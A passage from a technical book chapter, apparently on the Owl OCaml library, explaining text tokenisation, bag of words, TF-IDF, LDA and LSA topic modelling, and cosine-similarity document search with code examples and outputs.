with:\n\nlet print_freq vocab =\nNlp.Vocabulary.top vocab 10 |>\nOwl.Utils.Array.to_string ~sep:\", \" fst\n\nUnsurprisingly, the “the”’s and “a”’s are most frequently used:\n\n- : string =\n\"the, to, of, a, and, in, \\\", s, that, on\"\n\nChanging Nlp.Vocabulary.top to Nlp.Vocabulary.bottom can show the words of lowest frequency:\n\n\"eichorst, gcs, freeross, depoliticisation, humping, shopable, appurify, intersperse, vyaecheslav, raphaelle\"\n\nHowever, in a topic modelling task, we don’t want these too frequent but meaningless words and perhaps also the least frequent words that are not about the topic of this document. Now let’s trim off some most and least frequency words. You can trim either by absolute number or by percent. We use percent here, namely trimming off top and bottom 1% of the words.\n\nlet trim_vocabulary vocab =\nNlp.Vocabulary.trim_percent ~lo:0.01 ~hi:0.01 vocab\n\nWith a proper vocabulary at hands, now we are ready to tokenise a piece of text.\n\nlet tokenise vocab text =\nString.split_on_char ' ' text |>\nList.map (Nlp.Vocabulary.word2index vocab)\n\nFor example, if we tokenise “this is owl book”, you will get the following output.\n\ntokenise vocab \"this is an owl book\";;\n- : int list = [55756; 18322; 109456; 90661; 22362]\n\nFurthermore, we can now tokenise the whole news collection.\n\nlet tokenise_all vocab input_file =\nlet doc_s = Owl_utils.Stack.make () in\nOwl_io.iteri_lines_of_file\n(fun i s ->\nlet t =\nStr.split Owl_nlp_utils.regexp_split s\n|> List.filter (Owl_nlp_vocabulary.exits_w vocab)\n|> List.map (Owl_nlp_vocabulary.word2index vocab)\n|> Array.of_list\nin\nOwl_utils.Stack.push doc_s i)\ninput_file;\ndoc_s\n\nThe process is simple: in the text corpus each line is a document and we iterate through the text line by line. For each line/document, we remove the special characters, filter out the words that exist in the vocabulary, and map each word to an integer index accordingly. Even though this is a simplified case, it well illustrates the typical starting point of text analysis before delving into any topic modelling.\n\n### Use the Corpus Module\n\nBut we don’t have to build a text corpus step by step. We provide the NLP.Corpus module for convenience. By using the Nlp.Corpus.build we perform both tasks we have introduced: building vocabulary, and tokenising the text corpus. With this function we can also specify how to trim off the high-frequency and low-frequency words. Here is an example:\n\nlet main () =\nlet ids = Nlp.Corpus.unique \"news.txt\" \"clean.txt\" in\nPrintf.printf \"removed %i duplicates.\" (Array.length ids);\nlet corpus = Nlp.Corpus.build ~lo:0.01 ~hi:0.01 \"clean.txt\" in\nNlp.Corpus.print corpus\n\nThe Nlp.Corpus.unique function is just one more layer of pre-processing. It removes the possible duplicated lines/documents. The output prints out the processing progress, and then a summary of the corpus is printed out.\n\n2020-01-28 19:07:05.461 INFO : build up vocabulary ...\n2020-01-28 19:07:10.461 INFO : processed 13587, avg. 2717 docs/s\n2020-01-28 19:07:15.463 INFO : processed 26447, avg. 2644 docs/s\n...\n2020-01-28 19:08:09.125 INFO : convert to binary and tokenise ...\n2020-01-28 19:08:34.130 INFO : processed 52628, avg. 2104 docs/s\n2020-01-28 19:08:39.132 INFO : processed 55727, avg. 1857 docs/s\n...\ncorpus info\nfile path : news.txt\n# of docs : 129968\ndoc minlen : 10\n- : unit = ()\n\nThe corpus contains three parts: the vocabulary, token, and text string. By calling the build function, we also save them for later use. It creates several files in the current directory. First, there is the vocabulary file news.txt.voc and news.txt.voc.txt. They are the same; only that the latter is in a human-readable format that has each line a word and the corresponding index number. We can get the vocabulary with Corpus.get_vocab.\n\nThe tokenised text corpus is marshalled to the news.txt.tok file, and the string format content is saved as binary file to news.txt.bin. We choose to save the content as binary format to save file size. To get the i-th document, we can use Corpus.get corpus i to get the text string, or Corpus.get_tok corpus i to get an integer array that is tokenised version of this document.\n\nTo access different documents efficiently by the document index (line number), we keep track of the accumulated length of text corpus and token array after processing each document. These two types of indexes are saved in the news.txt.mdl file. This file also contains the document id. We have seen the minlen value in the output of corpus information. Each document with less than 10 words will not be included in the corpus. The document id is an int array that shows the index (line number) of each document in the original text corpus so that it can be traced back. The document id can be retrieved by Corpus.get_docid corpus\n\nIn the Corpus module, we provide three mechanisms to iterate through the text corpus: next, iteri, mapi. The next function is a generator that yields the next line of text document string in the text corpus until it hits the end of file. The iteri and mapi functions work exactly like in the normal Array module. The first function iterates all the documents one by one in the corpus, and the second maps all the documents in a corpus into another array. The iteri_tok and mapi_tok work the same, except that the function should work on integer array instead of string. Their signatures is shown below:\n\nval iteri : (int -> string -> unit) -> t -> unit\n\nval iteri_tok : (int -> int array -> unit) -> t -> unit\n\nval mapi : (int -> string -> 'a) -> t -> 'a array\n\nval mapi_tok : (int -> 'a -> 'b) -> t -> 'b array\n\nThe Corpus module is designed to support a large number of text corpus. With this tool in hand, we can further proceed with the discussion of topic modelling.\n\n## Vector Space Models\n\nBased on the tokenised text corpus, the next thing we need is a mathematical model to express abstract ideas such as “this sentence makes sense and that one does not”, “these two documents are similar”, or “the key word in that paragraph is such and such”. To perform NLP tasks such as text retrieval and topic modelling, we use the Vector Space Model (VSM) to do that.\n\nAccording to the Wikipedia, a VSM is “an algebraic model for representing text documents (and any objects, in general) as vectors of identifiers”. It may sound tricky but the basic idea is actually very simple. For example, let’s assume we only care about three topics in any news: covid19, economics, and election. Then we can represent any news article with a three-element vector, each representing the weight of this topic in it. For the BBC news “Coronavirus: Millions more to be eligible for testing”, we can represent it with vector (100, 2.5, 0). The specific value does not actually matter here. The point is that now instead of a large chunk of text corpus, we only need to deal with this vector for further processing.\n\nThe vector space model proposes a framework that maps a document to a vector $$d = (x_1, x_1, \\ldots, x_N)$$. This N-dimensional vector space is defined by $$N$$ basic terms. Under this framework, we mainly have to decide on three factors. The first is to choose the meaning of each dimension, or the $$N$$ basic concepts in the vector space. The second is to specify the weight of each dimension for a document. In our simple example, why do we assign the first weight to 100 instead of 50? There should be rules about it. That means we need a proper mapping function $$f$$ defined. Finally, after learning the vector representation, we can we can cluster or search the documents based on their similarity. Some common metrics of similarity are Euclidean distance and cosine similarity. We will talk about it later.\n\nIn this chapter we focus on mapping a document to a vector space. However, VSM is not limited to only documents. We can also map a word into a vector that represents a point in a certain vector space. This vector is also called word embedding. In a proper representation, the similar words should be cluster together, and can even be used for calculation such as:\n\n$V_\\textrm{king} - V_\\textrm{man} + V_\\textrm{women} \\approx V_\\textrm{queen}.$\n\nOne of the most widely used methods for word embedding is the word2vec proposed in (Mikolov, Le, and Sutskever 2013). It includes different algorithms such as the skip-gram for computing the vector representation of words. For general purpose use, Google has already published a pre-trained word2vec-based word embedding vector set based on part of the GoogleNews dataset. This vector set contains 300-dimensional vectors for 3 million words and phrases.\n\nNow, let’s return to the theme of mapping documents to vector space. In the next chapter, we will start with a simple method that instantiate the VSM: the Bag of Words.\n\n## Bag of Words (BOW)\n\nThe Bag of Words is a simple way to map docs into a vector space. This space uses all the vocabulary as the dimensions. Suppose there are totally $$N$$ different words in the vocabulary, then the vector space is of $$N$$ dimension. The mapping function is simply counting how many times each word in the vocabulary appears in a document.\n\nFor example, let’s use the five words “news”, “about”, “coronavirus”, “test”, and “cases” as the five dimensions in the vector space. Then if a document is \"...we heard news a new coronavirus vaccine is being developed which is expected to be tested about September...\" will be represented as [1, 1, 1, 1, 0] and the document \"...number of positive coronavirus cases is 100 and cumulative cases are 1000...\" will be projected to vector [0, 0, 1, 0, 2].\n\nThis Bag of Words method is easy to implement based on the text corpus. We first define a function that count the term occurrence in a document and return a hash table:\n\nlet term_count htbl doc =\nArray.iter\n(fun w ->\nmatch Hashtbl.mem htbl w with\n| true ->\nlet a = Hashtbl.find htbl w in\nHashtbl.replace htbl w (a +. 1.)\n| false -> Hashtbl.add htbl w 1.)\ndoc\n\nThe hash table contains all the counts of words in this document. Of course, we can also represent the returned results as an array of integers, though the array would likely be sparse. Then we can apply this function to all the documents in the corpus using the map function:\n\nlet build_bow corpus =\nNlp.Corpus.mapi_tok\n(fun i doc ->\nlet htbl = Hashtbl.create 128 in\nterm_count htbl doc;\nhtbl)\ncorpus\n\nBased on this bag of words, the similarity between two vectors can be measured using different methods, e.g. with a simple dot product.\n\nThis method is easy to implement and the computation is inexpensive. It may be simple, but for some tasks, especially those that have no strict requirement for context or position of words, this method proves to work well. For example, to cluster spam email, we only need to specify proper keywords as dimensions, such as “income”, “bonus”, “extra”, “cash”, “free”, “refund”, “promise” etc. We can expect that the spam email texts will be clustered closely and easy to recognise in this vector space using the bag of words.\n\nActually, one even simpler method is called Boolean model. Instead of term frequency (count of word), the table only contains 1 or 0 to indicate if a word is present in a document. This approach might also benefit from its simplicity and proved to be useful in certain tasks, but it loses the information about the importance of the word. One can easily construct a document that is close to everyone else, by putting all the vocabulary together. The bag of word method fixes this problem.\n\nOn the other hand, this simple approach does have its own problems. Back to the previous example, if we want to get how close a document is to \"news about coronavirus test cases\", then the doc \"...number of positive coronavirus cases is 100 and cumulative cases are 1000...\" is scored the same as \"hey, I got some good news about your math test result...\". This is not what we expected. Intuitively, words like “coronavirus” should matter more than the more normal words like “test” and “about”. That’s why we are going to introduce an improved method in the next section.\n\n## Term Frequency–Inverse Document Frequency (TF-IDF)\n\nIn this previous section, we use the count of each term in representing document as vector. It is a way to represent the frequency the term in the document, and we can call it term frequency. In the previous section we have seen the intuition that the meaning of different word should be different. This cannot be fixed by simply using term count. In this section we introduce the idea of Inverse Document Frequency (IDF) to address this problem.\n\nThe basic idea is simple. The IDF is used to represent how common a word is across all the documents. You can imagine that if a word is used throughout all the documents, then it must be of less importance in determining a feature of a document. On the other hand, if a word exists in only 1-2 documents, and where it exists, this word must be of crucial importance to determine its topic. Therefore, the IDF factor can be multiplied with the term frequency to present a more accurate metric for representing a document as vector. This approach is called TF-IDF.\n\nActually, the two parts TF and IDF just provide frameworks for different computation methods. To compute the term frequency, we can use the count of words $$c$$, or the percentage of word in the current document $$\\frac{c}{N}$$ where $$N$$ is the total number of words in the document. Another computation method is logarithm normalisation which use $$\\textrm{log}(c + 1)$$. We can even use the boolean count that take the frequency of word that exists to be 1 that the ones that are not to be 0. These methods are all defined in the Owl_nlp.Tfidf module.\n\ntype tf_typ =\n| Binary\n| Count\n| Frequency\n| Log_norm\n\nThe same goes for the IDF. To measure how common a word $$w$$ is across all the document, a common way to compute is to do: $$log(\\frac{N_D}{n_w})$$, where $$N_D$$ is the total number of documents and $$n_w$$ is the number of documents with term $$w$$ in it. This metric is within the range of $$[0, \\infty)$$. It increases with larger total document number or smaller number of documents that contain a specific word. An improved version is called Idf_Smooth. It is calculated as $$log(\\frac{N_D}{n_w + 1})$$. This method avoid the $$n_w$$ to be zero to cause divide error, and also avoid getting a 0 for a word just because it is used across all the documents. In Owl they are included in the type df_typ. Here the Unary method implies not using IDF, only term frequency.\n\ntype df_typ =\n| Unary\n| Idf\n| Idf_Smooth\n\nIn Owl we have the Owl_nlp.Tfidf module to perform the TF-IDF method. The corpus we have built in the previous section is used as input to it. Specifically, we use the Nlp.Tfidf.build function to build the TFIDF model:\n\nlet build_tfidf corpus =\nlet tf = Nlp.Tfidf.Count in\nlet df = Nlp.Tfidf.Idf in\nlet model = Nlp.Tfidf.build ~tf ~df corpus in\nNlp.Tfidf.save model \"news.tfidf\";\nmodel\n\nIn this code, we configure to use the bag-of-words style word count method to calculate term frequency, and use the normal logarithm method to compute inverse document frequency. The model can be saved for later use. After the model is build, we can search similar documents according to a given string. As a random example, let’s just use the first sentence in our first piece of news in the dataset as search target: \"a brazilian man who earns a living by selling space for tattoo adverts on his body is now looking for a customer for his forehead\".\n\nlet query model doc k =\nlet typ = Owl_nlp_similarity.Cosine in\nlet vec = Nlp.Tfidf.apply model doc in\nlet knn = Nlp.Tfidf.nearest ~typ model vec k in\nknn\n\nRecall the three ingredients in vector space model: choosing dimension topic words, mapping document to vector, and the measurement of similarity. Here we use the cosine similarity as a way to measure how aligned two vectors $$A$$ and $$B$$ are. We will talk about the similarity measurement in detail later.\n\nNext, the vec returned by the apply functions return an array of (int * float) tuples. For each item, the integer is the tokenised index of a word in the input document doc, and the float number is the corresponding TF-IDF value, based on the model we get from previous step. Finally, the nearest function searches all the documents and finds the vectors that have the largest similarity with the target document. Let’s show the top-10 result by setting k to 10:\n\nval knn : (int * float) array =\n[|(11473, -783.546068863270875); (87636, -669.76533603535529);\n(121966, -633.92555577720907); (57239, -554.838541799660675);\n(15810, -550.95468134048258); (15817, -550.775276912183131);\n(15815, -550.775276912183131); (83282, -547.322385552312426);\n(44647, -526.074567425088844); (0, -496.924176137374445)|]\n\nThe returned result shows the id of the matched documents. We can retrieve each document by running e.g. Owl_nlp.Corpus.get corpus 11473. To save you some effort to do that, here we list link to some of the original news that are matched to be similar to the target document:\n\n1. Every tatto tells a story, doc id: 11473. [Link]\n2. The Complete Guide to Using Social Media for Customer Service, doc id: 87636. [Link]\n3. Murder ink? Tattoos can be tricky as evidence, doc id: 57239. [Link]\n5. The profusion of temporarily Brazilian-themed products, doc id:44647. [Link]\n\nIf you are interested, the input document comes from this BBC news: Brazil: Man ‘earns a living’ from tattoo ads. Then you can see that, the searched result is actually quite related to the input document, especially the first one, which is exactly the same story written in another piece of news. The second result is somewhat distant. The word “customer” is heavily used in this document, and we can guess that it is also not frequently seen throughout the text corpus. The fourth news is not about the tattoo guy, but this news features the topic of “customer” and “adverts”. The fifth news is chosen apparently because of the non-frequent word “brazilian” carries a lot of weight in TF-IDF. The interesting thing is that the same document, the first document, is ranked only 10th closest. Note that we just simply take a random sentence without any pre-processing or keyword design; also we use the un-trimmed version of text corpus. Even so, we can still achieve a somewhat satisfactory matching result, and the result fits nicely with the working mechanisms of the TF-IDF method.\n\n## Latent Dirichlet Allocation (LDA)\n\nIn the previous section, we have seen that by specifying a document and using it as a query, we can find out the similar documents as the query. The query document itself is actually seen as a collection of words. However, the real world text, article or news, are rarely as simple as collections of words. More often than not, an article contains one or more topics. For example, it can involve the responsibility of government, the protection of environment, and a recent protest in the city, etc. Moreover, each of these topics can hardly be totally covered by just one single word. To this end we introduce the problem topic modelling: instead of proposing a search query to find similar content in text corpus, we hope to automatically cluster the documents according to several topics, and each topic is represented by several words.\n\nOne of such method to do topic modelling is called Latent Dirichlet Allocation (LDA). The trained model of LDA contains two matrices. The first is called the “document-topic”, which contains the number of tokens assigned to each topic in each doc. What do these topics look like then? This concerns the other trained matrix in the model: the “word-topic table”. It contains the number of tokens assigned to each topic for each word. We will see how they work in a latter example. But first, some background theory.\n\n### Models\n\nLet’s take a look at the model of LDA that is proposed in (Blei, Ng, and Jordan 2003). That is to say, how the LDA thinks about the way a document is composed. The model is expressed in fig. 1.\n\nThis model uses the plate notation, the notation for describing probabilistic graphical models, to capture the dependencies among variables. In tbl. 1 we list the definition of the math notations used here and latter in this section.\n\nTable 1: Variable notations in the LDA model\nVariable Meaning\n$$K$$ number of topics\n$$D$$ number of documents in text corpus\n$$V$$ number of words in the vocabulary\n$$N$$ total number or words in all document\n$$\\alpha$$ vector of length $$K$$, prior weight of the $$K$$ topics in a document\n$$\\beta$$ vector of length $$V$$, prior weight of the $$V$$ words in a topic\n$$\\Theta$$ vector of length $$K$$, distribution of topics in a document\n$$\\phi$$ vector of length $$V$$, distribution of words in a topic\n$$Z$$ matrix of shape $$D\\times~V$$, topic assignment of all words in all documents\n$$W$$ matrix of shape $$D\\times~V$$, token of words in all documents\n$$n_{d,k}$$ how many times the document $$d$$ uses topic $$k$$ in the document-topic table\n$$m_{k,w}$$ the number of times topic $$k$$ uses word $$w$$ in the topic-word table\n\nIn this model, to infer the topics in a corpus, we imagine a generative process to create a document. The core idea here is that each document can be described by the distribution of topics, and each topic can be described by distribution of words. This makes sense, since we don’t need the text in order to find the topics in an article. The process is as follows:\n\n1. Initialise the distribution of topics $$\\theta_d \\sim \\textrm{Dirichlet}(\\alpha)$$ in document $$d$$. $$\\textrm{Dirichlet}(\\alpha)$$ is a Dirichlet distribution parameterised by $$\\alpha$$. We will talk about it in detail later.\n2. Initialise the distribution of words $$\\phi_k \\sim \\textrm{Dirichlet}(\\beta)$$ for topic $$k$$.\n3. Iterate each document $$d$$ and each word position $$w$$, and then perform the steps below:\n• first, picks one of these topics randomly (one of the elements in $$Z$$). Specifically, the choice of topic is actually taken according to a categorical distribution, parameterised by $$\\theta$$. Formally, this step is represented as $$Z_{d,w} \\sim \\textrm{Categorical}(\\theta_d)$$;\n• second, according to the words this topic contains, we pick a word randomly according to $$\\phi$$. The picking process also follows categorical distribution: $$W_{d,w} \\sim \\textrm{Categorical}(\\phi_{Z_{d,w}})$$.\n\nAfter finishing this generative process, we now have a “fake” document. The total probability of the model is:\n\n$P(W, Z, \\theta, \\phi; \\alpha, \\beta) = \\prod_{i=1}^K~P(\\phi_i; \\beta)~\\prod_{j=1}^D~P(\\theta_j; \\alpha)~\\prod_{t=1}^N~P(Z_{j,t}| \\theta_j)~P(W_{j,t}| \\phi_{Z_{j,t}}).\\qquad(1)$\n\nThe eq. 1 corresponds to the above process and model in fig. 1 step by step. It is a multiplication of three parts: the probability of $$\\theta$$ across all the documents, the probability of $$\\phi$$ across all the topics, and that of the generated words across all documents. The LDA hopes to make this generated document to be close to a real document as much as possible. In another word, when we are looking at real document, LDA tries to maximise the possibility eq. 1 that this document can be generated from a set of topics.\n\n### Dirichlet Distribution\n\nThere is something we need to add to the generative process in the previous section. How $$theta$$ and $$phi$$ are generated? Randomly? No, that would not be a proper way. Think about what would happen if we randomly initialise the document-topic table: each document will be equally likely to contain any topic. But that’s rarely the case. An article cannot talk about all the topics at the same time. What we really hope however, is that a single document belongs to a single topic, which is a more real-world scenario. The same goes for the word-topic table.\n\nTo that end, LDA uses the Dirichlet Distribution to perform this task. It is a family of continuous multivariate probability distribution parameterised by a vector $$\\alpha$$. For example, suppose we have only two topics in the whole world. The tuple (0, 1) means it’s totally about one topic, and (1,0) means its totally about the other. We can run the Stats.dirichlet_rvs function to generate such a pair of float numbers. The results are shown in fig. 2. Both figures have the same number of dots. It shows that with smaller $$\\alpha$$ value, the distribution is pushed to the corners, where it is obviously about one topic or the other. A larger $$\\alpha$$ value, however, makes the topic concentrate around the middle where it’s a mixture of both topics.\n\nTherefore, in the model in fig. 1, we have two parameters $$\\alpha$$ and $$\\beta$$ as prior weights to initialise $$\\Theta$$ and $$\\phi$$ respectively. We use reasonably small parameters to have skewed probability distributions where only a small set of topics or words have high probability.\n\n### Gibbs Sampling\n\nNext, we will briefly introduce how the training algorithm works to get the topics using LDA. The basic idea is that we go through the documents one by one. Each word is initially assigned a random topic from the Dirichlet distribution. After that, we iterate over all the documents again and again. In each iterate, we look at each word, and try to find a hopefully a bit more proper topic for this word. In this process, we assume that all the other topic assignments in the whole text corpus are correct except for the current word we are looking at. Then we move forward to the next word in this document. In one iteration, we process all the words in all the documents in the same way. After enough iteration, we can get a quite accurate assignment for each word. And then of course the topics of each document would be clear.\n\nWe need to further explain some details in this general description. The most important question is, in the sampling of a document, how exactly do we update the topic assignment of a word? We use the Gibbs Sampling algorithm to approximate the distribution of $$P(Z | W; \\alpha, \\beta)$$. For this word, we expect to get a vector of length $$k$$ where $$k$$ is the number of topics. It represents a conditional probability distribution of a one word topic assignment conditioned on the rest of the model. Based on eq. 1, it can be derived that, in this distribution vector, the k-th element is:\n\n$p(Z_{d,n}=k | Z_{-d,n}, W, \\alpha, \\beta) = \\frac{n_{d,k} + \\alpha_k}{\\sum_{i=1}^K~(n_{d,i} + \\alpha_i)}~\\frac{m_{k,w_{d.n}} + \\beta_{w_{d,n}}}{\\sum_i~m_{k, i} + \\beta_i}.$\n\nHere $$w_{d,n}$$ is the current word we are looking at. To perform the sampling, we assume that only the current topic assignment to $$w_{d,n}$$ is wrong, so we remove the current assignment from the model before this round of iteration begins. $$Z$$ is the topic assignment of all words in all documents, and $$W$$ is the text corpus.\n\nThis computations is a multiplication of two parts. As shown in tbl. 1, in the first part, $$n_{d,k}$$ shows how many times the document $$d$$ uses topic $$k$$, and $$\\alpha_k$$ is the prior weight of topic $$k$$ in document. Therefore, this item means the percentage of words that are also assigned the same topic in the whole document. To put it more simply, it shows how much this document likes topic $$k$$. The larger it is, the more likely we will assign the current word to topic $$k$$ again. Similarly, the second part is the percentage of words that are also assigned the same topic in the whole document. Therefore, this item indicates how does topic like the word $$w$$. Larger number means $$w$$ will be assigned to this topic $$k$$ again.\n\nFinally, we multiply these two items to get the final distribution of probability of the word $$w_{d,n}$$, in the form of a vector of length $$K$$. Then we can uniformly draw a topic from this vector. We iterate this sampling process again and again until the model is good enough.\n\n### Topic Modelling Example\n\nOwl contains the Owl_nlp.Lda module to perform LDA method. Let’s first use an example to demonstrate how LDA works.\n\nlet build_lda corpus topics =\nlet model = Nlp.Lda.init ~iter:1000 topics corpus in\nNlp.Lda.(train SimpleLDA model);\nmodel\n\nThe input to LDA is still the text corpus we have built. We also need to specify how many topics we want the text corpus to be divided into. Let’s say we set the number of topics to 8. The process is simple, we first initialise the model using the init function and then we can train the model. Let’s take a look at the document-topic table in this model, as shown below.\n\nval dk : Arr.arr =\nC0 C1 C2 C3 C4 C5 C6 C7\nR0 13 13 4 7 11 12 14 16\nR1 35 196 15 42 31 23 122 4\nR2 7 9 3 1 3 163 2 4\nR3 10 22 23 140 18 11 17 143\n...\n\nThis matrix shows the distribution of topics in each document, represented by a row. Each column represents a topic. For example, you can see that the fifth column of in the third document (R2) is obviously larger than the others. It means that dominantly talks about only the topic 6. Similarly, in the fourth document, the topic 4 and topic 8 are of equal coverage.\n\nWe can then check the topic-word table in this model:\n\nval wk : Arr.arr =\nC0 C1 C2 C3 C4 C5 C6 C7\nR0 1 0 0 0 0 0 0 0\nR1 0 0 0 1 0 0 0 0\nR2 0 0 0 0 3 0 0 0\nR3 0 0 0 0 0 0 0 3\n...\n\nThis is sparse matrix. Each row represents a word from the vocabulary. A topic in a column can thus be represented as the words that have the largest numbers in that column. For example, we can set that a topic be represented by 10 words. The translation from the word-topic table to text representation is straightforward:\n\nlet get_topics vocab wt =\nMat.map_cols (fun col ->\nMat.top col 10\n|> Array.map (fun ws ->\nOwl_nlp.Vocabulary.index2word vocab ws.(0))\n) wt\n\nAs an example, we can take a look at the topics generated by the “A Million News Headlines” dataset.\n\nTopic 1: police child calls day court says abuse dead change market\nTopic 2: council court coast murder gold government face says national police\nTopic 3: man charged police nsw sydney home road hit crash guilty\nTopic 4: says wa death sa abc australian report open sex final\nTopic 5: new qld election ban country future trial end industry hour\nTopic 6: interview australia world cup china south accused pm hill work\nTopic 7: police health govt hospital plan boost car minister school house\nTopic 8: new water killed high attack public farmers funding police urged\n\nHere each topic is represented by ten of its highest ranked words in the vocabulary, but you might “feel” a common theme by connecting these dots together, even though some words may stride away a bit far away from this theme. We cannot directly observe the topic, only documents and words. Therefore the topics are latent. The word-topic matrix shows that each word has different weight in the topic and the words in a topic are ranked according to the weight. Now that we know what each topic talks about, we can cluster the documents by their most prominent topic, or just discover what topics are covered in a document, with about how much percentage each.\n\nWe have introduced the basic mechanism of LDA. There are many work that extend based on it, such as the SparseLDA in (Yao, Mimno, and McCallum 2009), and LightLDA in (Yuan et al. 2015). They may differ in details but share similar basic theory.\n\n## Latent Semantic Analysis (LSA)\n\nBesides LDA, another common technique in performing topic modelling is the Latent Semantic Analysis (LSA). Its purpose is the same as LDA, which is to get two matrices: the document-topic table, and the word-topic table to show the probability distribution of topics in documents and words in topics. The difference is that, instead of using an iterative update approach, LSA explicitly builds the document-word matrix and then performs the singular value decomposition (SVD) on it to get the two aforementioned matrices.\n\nAssume the text corpus contains $$n$$ documents, and the vocabulary contains $$m$$ words, then the document-word matrix is of size $$n\\times~m$$. We can use the simple word count as the element in this matrix. But as we have discussed in previous section, the count of words does not reflect the significance of a word, so a better way to fill in the document-word matrix is to use the TF-IDF approach for each word in a document.\n\nApparently, this matrix would be quite sparse. Also its row vectors are in a very high dimension. There is surely redundant information here. For example, if two documents talk about the same topic(s), then the words they contain will largely overlap. To this end, the SVD is then used to reduce the dimension and redundancy in this matrix.\n\nWe have seen the SVD in the linear algebra chapter. It is widely used for reducing the dimension of information, by rotating and scaling the coordinating system to find suitable dimensions. SVD decomposes a matrix $$A$$ into $$A = USV^T$$. In this specific context of semantic analysis, $$A$$ is the document-word composition. We can think of the $$U$$ as representing the relationship between document and the topics, and $$V^T$$ as the relationship between topics and words.\n\nThe columns of $$U$$ and rows of $$V^T$$ are both orthonormal bases, and the diagonal matrix $$S$$ has eigenvalues along its diagonal, each representing the weight of a group of corresponding bases from $$U$$ and $$V$$. Therefore, we can throw away the bases with less weight, truncating only $$K$$ columns (rows) from each matrix. In that way, we can preserve a large part of the information from the original document-word table by choosing only a small number of topics. This process is shown in fig. 3. Once we have the document-topic table $$U$$ and the topic-word table $$V$$, using the model will be the same as in LDA example.", null, "Figure 3: Applying SVD and then truncating on document-word matrix to retrieve topic model\n\nCompared to LDA, this process is easy to understand and implement. However, SVD is computationally intensive and hard to iterate with new data. The result is decent, but as this blog shows, it may not be as good as LDA in separating out the topic categories.\n\nApplication of topic modelling is wide. For example, it can be used for summarising the large corpus of text data, text categorisation, spam filter, the recommender system, or automatic tagging of articles, etc. It can even be used to effectively discover useful structure in large collection of biological data.\n\n## Search Relevant Documents\n\nTopic models are effective tools for clustering documents based on their similarity or relevance. We can further use this tool to query relevant document given an input one. In this section, we will go through some techniques on how to query models built using the previous topic modelling method.\n\n### Euclidean and Cosine Similarity\n\nIn the previous sections, we see that the topic modelling techniques maps documents to a vector space of topics. We can use different metrics to compare the similarity between two vectors. Two of the commonly used are the Euclidean and Cosine distances. Suppose we have two vectors $$A$$ and $$B$$, both of length of $$n$$. Then the Euclidean distance between these two are:\n\n$\\sqrt{\\sum_{i=1}^n~(a_i - b_i)^2}.\\qquad(2)$\n\nThe cosine similarity between two vectors $$A$$ and $$B$$ is defined as:\n\n$cos(\\theta) = \\frac{A.B}{\\|A\\|~\\|B\\|}.\\qquad(3)$\n\nIt is the dot product of two vectors divided by the product of the length of both vectors.", null, "Figure 4: Euclidean distance and cosine similarity in a two dimensional space\n\nWe have implemented both methods in the Nlp.Similarity module as similarity metrics for use in NLP. The relationship between the Euclidean distance and Cosine similarity can be expressed in fig. 4. There are two points on this two dimensional space. The Euclidean measures the direct distance of these two points, while the cosine similarity is about the degree between these two vectors. Therefore, the cosine similarity is more suitable for cases where the magnitude of the vectors does not matter. For example, in topic modelling, we already have two vectors representing documents. If we multiply all the elements in one of them by a scalar 10, the Euclidean distance between these two would change greatly. However, since the probability distribution in the vector does not change, we don’t expect the similarity between these two vectors to change. That’s why in this case we would prefer to use the cosine similarity as a measurement.\n\n### Linear Searching\n\nSuppose we have $$n$$ documents, each represented by a vector of length $$m$$. They are then denoted with variable corpus, an array of arrays, each of which is a document. We provide a vector doc as the query to search for the top-$$k$$ similar documents to it. First, we need a function to calculate pairwise distance for the whole model, and returns result in the form of array of (id, dist). Here id is the original index of the document. dist is the distance between a document in corpus and the query document.\n\nlet all_pairwise_distance typ corpus x =\nlet dist_fun = Owl_nlp_similarity.distance typ in\nlet l = Array.mapi (fun i y -> i, dist_fun x y) corpus in\nArray.sort (fun a b -> Stdlib.compare (snd a) (snd b)) l;\nl\n\nThe results are sorted according to the distance, whichever distance metric we use. Based on this routine we can find the $$k$$ most relevant document:\n\nlet query corpus doc k =\nlet typ = Owl_nlp_similarity.Cosine in\nlet l = all_pairwise_distance typ corpus doc in\nArray.sub l 0 k\n\nHere we use the cosine similarity as measurement of distance between vectors. To improve the efficiency of computation, we can instead using matrix multiplication to implement the cosine similarity. Specifically, suppose we have the query document vector $$A$$, and the corpus of document vector as before, and this array of arrays has already been converted to a dense matrix $$B$$, where each row vector represents a document. Then we can compute the $$AB^T$$ to get the cosine similarity efficiently. Of course, according to eq. 3, we also need to make sure that $$A$$ and each row $$r$$ in $$B$$ are normalised by its own L2-norm before computations, so that for any vector $$v$$ we can have $$\\|v\\| = 1$$.\n\nlet query corpus doc k =\nlet vec = Mat.transpose doc in\nlet l = Mat.(corpus *@ vec) in\nMat.bottom l k\n\nCompared to the previous direct element-by-element multiplication, the matrix dot multiplication is often implemented with highly optimised linear algebra library routines, such as in OpenBLAS. These methods utilise various techniques such as multi-processing and multi-threading so that the performance is much better than a direct pairwise computation according to definition.\n\n## Summary\n\nIn this chapter, we focus on topic modelling, one important natural language processing task, and introduce the basic idea and how Owl support it. First, we introduce how to tokenise text corpus for further mathematical processing. Then we introduce the basic idea of the vector space, and two different ways: the Bag of words (BOW), and Term Frequency–Inverse Document Frequency (TF-IDF), to project a document into a vector space as single vector. The BOW is straightforward to understand and implement, and the TF-IDF consider the how special a word is across the whole text corpus, and therefore usually gives more accurate representation.\n\nNext, we present two different methods based on the vector representation to retrieve topics from the documents: the Latent Dirichlet Allocation (LDA), and Latent Semantic Analysis (LSA). The LSA relies on the singular value decomposition technique on a document-word matrix to do that, while LDA relies on a generative model to iteratively to get the topic model. Once we have the topic modelling, we can compare the similarity between documents, or search for similar documents in the text corpus using different measurement of vector distances. The cosine similarity is a common one in text analysis. The computation of search process can be optimised using matrix multiplication." ]
[ null, "https://ocaml.xyz/book/images/nlp/svd.png", null, "https://ocaml.xyz/book/images/nlp/similarity.png", null ]
